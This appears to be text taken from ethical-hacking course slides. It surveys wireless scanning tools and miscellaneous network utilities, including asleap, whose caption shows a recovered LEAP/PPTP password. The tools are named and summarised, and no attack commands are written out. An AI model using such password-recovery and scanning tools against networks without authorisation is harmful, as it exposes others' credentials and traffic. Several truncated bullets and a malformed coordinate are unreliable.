[Screenshot: gkismet main window. Menu: File, View, Settings, Help. Toolbar: Connect, Disconnect, Expand, Collapse, Packet Dump, String Dump. Network list showing SSIDs: Anton's Fortress, default, linksys, <no ssid>. Right-hand panel with fields: Location, Packets, Networks, Crypt, Weak, Noise, Dropped, Rate; GPS data: Latitude, Longitude, Altitude, Speed, Fix; Packet rate graph; Card power; Close button.]
Wireless Tool : Gpsd

• Service daemon that monitors one or more GPSes attached to a host computer through serial or USB ports
• Multiple GPS client applications can share access to GPSes without loss of data
• Responds to queries with a format that is substantially easier to parse





Screenshot : Gpsd

GPSD,P=40.034S77 -75.520065
Wireless Tool : Gpsdrive

• Gpsdrive is a car ... system
• Displaying your pc...

[Screenshot: GpsDrive Control window, "Settings 2" tab (other tabs: Way points, Geo Info). Misc settings: Show Shadows, Etched frames, Simulation, Follow target, Maximum CPU load (50%), Track, Color. Units: Miles, Metric (selected), Nautic; Decimal position. Font and color settings: WP Label, Big display, Display color.]
Wireless Tool : Hostapd

• User space daemon for access point and authentication servers
• Supports separate front-end programs
  - text-based front-end
  - hostapd_cli
• Implements
  - IEEE 802.11 access point management
  - IEEE 802.1X/WPA/WPA2/EAP Authenticators
  - RADIUS client
  - EAP server
  - RADIUS authentication server
Wireless Tool : Wellenreiter

• Wireless network discovery and auditing tool
• Easiest to use Linux scanning tool
• Discovers networks (BSS/IBSS), and automatically detects ESSID-broadcasting or non-broadcasting networks, their WEP capabilities and the manufacturer

[Screenshot: Wellenreiter II main window (File and Sniffer menus, About) with the network list, and the Log tab showing:]

[23:20:11] (i) Wellenreiter has been started.
[23:20:11] (i) Running on 'Unknown'.
[23:20:23] (i) Started Scanning.
[23:20:25] (i) New network: ESSID 'Vanille'
[23:20:25] (i) New Access Point in 'Vanille' [6]
[23:21:17] (i) New Wireless Station in 'Vanille' [kk]
[23:21:19] WARNING: Unhandled IBSS traffic!
[23:21:25] WARNING: Unhandled IBSS traffic!
[23:21:26] WARNING: Unhandled IBSS traffic!
[23:21:28] WARNING: Unhandled IBSS traffic!
[23:21:43] WARNING: Unhandled IBSS traffic!
[23:21:56] (i) New Station in 'Vanille' [xx]
[23:22:42] (i) Stopped Scanning.
Wireless Tools : Wpasupplicant, Xsupplicant

wpasupplicant

• Provides key negotiation with the WPA Authenticator
• Controls association with IEEE 802.11i networks

xsupplicant

• Allows a workstation to authenticate with a RADIUS server using 802.1X and the EAP protocol
• Used for computers with wired or wireless LAN connections
• Supports dynamic assignment of WEP keys







Ethical Hacking

Miscellaneous Tools

Miscellaneous Tool : Asleap

• Exposes the weaknesses in Cisco's LEAP protocol
• Reads weak LEAP passwords from any wireless interface
• Performs channel hopping to look for targets
• Uses a dynamic database table and index to make lookups on large files

[Terminal screenshot: asleap 1.4 ("actively recover LEAP/PPTP passwords", "Using the passive attack method") run against a captured PPTP exchange with a dictionary file and its index. Output lists "Captured PPTP exchange information:" with the fields username, auth challenge, peer challenge, peer response, challenge, hash bytes, NT hash and password; the hex values are illegible in the scan, the recovered password is shown as "turquoise".]




Miscellaneous Tools : Cryptcat, CryWrap

Cryptcat

• A Unix utility
• Uses TCP or UDP protocols to read and write data across network connections
• Encrypts the data being transmitted
• Reliable back-end tool

CryWrap

• A Unix utility
• Wraps TCP services such as POP3, IMAP, SMTP
• Encrypts data using TLS/SSL
• Works with existing servers and doesn't require any modifications
• A drop-in replacement for sslwrap
Miscellaneous Tool : l2tpns

• l2tpns is a layer 2 tunneling protocol network server
• Supports up to 65535 concurrent sessions per server/cluster
• Syntax: l2tpns [file] [hostname]






Miscellaneous Tool : Netdiag

• A command-line diagnostic tool
• Helps to isolate networking and connectivity problems
• Performs a series of tests to determine the state of a network client

C:\WINNT\system32\cmd.exe

C:\Program Files\Resource Kit>netdiag /?

Usage: netdiag [/Options]>
    /q - Quiet output (errors only)
    /v - Verbose output
    /l - Log output to NetDiag.log
    /debug - Even more verbose.
    /d:<DomainName> - Find a DC in the specified domain.
    /fix - fix trivial problems.
    /DcAccountEnum - Enumerate DC machine accounts.
    /test:<test name> - tests only this test. Non - skippable tests will still be run
        Valid tests are :-
            Ndis - Netcard queries Test
            IpConfig - IP config Test
            Member - Domain membership Test
            NetBTTransports - NetBT transports Test
            Autonet - Autonet address Test
            IpLoopBk - IP loopback ping Test
            DefGw - Default gateway Test
            NbtNm - NetBT name Test
            WINS - WINS service Test
            Winsock - Winsock Test
            DNS - DNS Test
Miscellaneous Tool : OpenSSL

• OpenSSL is a cryptographic toolkit
• Implements the Secure Sockets Layer and Transport Layer Security network protocols
• Exposes the various cryptographic functions of OpenSSL's crypto library from the shell
Miscellaneous Tool : Proxychains

• Forces any TCP connection made by any TCP client to go through a proxy
• Supports SOCKS4, SOCKS5 and HTTP CONNECT proxy servers
Miscellaneous Tools : Rdesktop, Sslwrap

Rdesktop

• A Remote Desktop Protocol (RDP) client for accessing Windows NT Terminal Server
• Open source client for Windows NT Terminal Server and Windows 2000/2003 Terminal Services
• Runs on most UNIX-based platforms with the X Window System

SslWrap

• Program that wraps normal socket connections with SSL/TLS
• Used with TCP services such as POP3, IMAP, SMTP, and encrypts all of the data
• Can also encrypt data for services located on another computer
Miscellaneous Tool : UDPTunnel

• Program which can tunnel UDP packets bi-directionally over a TCP connection
• Runs in two modes: a client mode and a server mode